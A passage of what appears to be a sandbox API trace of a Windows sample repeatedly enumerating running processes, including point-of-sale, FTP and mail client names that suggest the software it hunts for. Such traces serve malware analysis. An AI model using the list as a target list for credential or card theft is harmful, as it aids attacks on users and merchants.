lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0248.162] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0248.164] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0248.165] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0248.167] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0248.169] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0248.171] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0248.173] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0248.174] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0248.176] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0248.178] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0248.179] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.181] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.182] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.280] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.282] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0248.284] CloseHandle (hObject=0x758) returned 1 [0248.284] Sleep (dwMilliseconds=0x64) [0248.523] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0248.553] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.555] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.557] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.558] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.675] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.677] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.679] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.681] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.683] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.689] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.691] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.693] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.695] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.697] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.700] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.705] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.707] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.709] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.711] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.714] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.909] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0248.911] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0248.914] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.916] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.918] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0248.920] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0248.928] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0248.930] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.933] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0248.939] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0248.941] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.944] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0248.946] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0248.948] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0249.066] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0249.068] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0249.070] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0249.072] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0249.074] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0249.076] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0249.082] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0249.084] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0249.086] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0249.088] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0249.093] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0249.096] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0249.098] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0249.100] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0249.102] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0249.104] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0249.191] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0249.193] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0249.195] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0249.197] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0249.198] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0249.204] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0249.206] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0249.208] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0249.210] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0249.213] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0249.218] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0249.221] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0249.223] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0249.226] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0249.229] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0249.282] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0249.284] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0249.286] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, 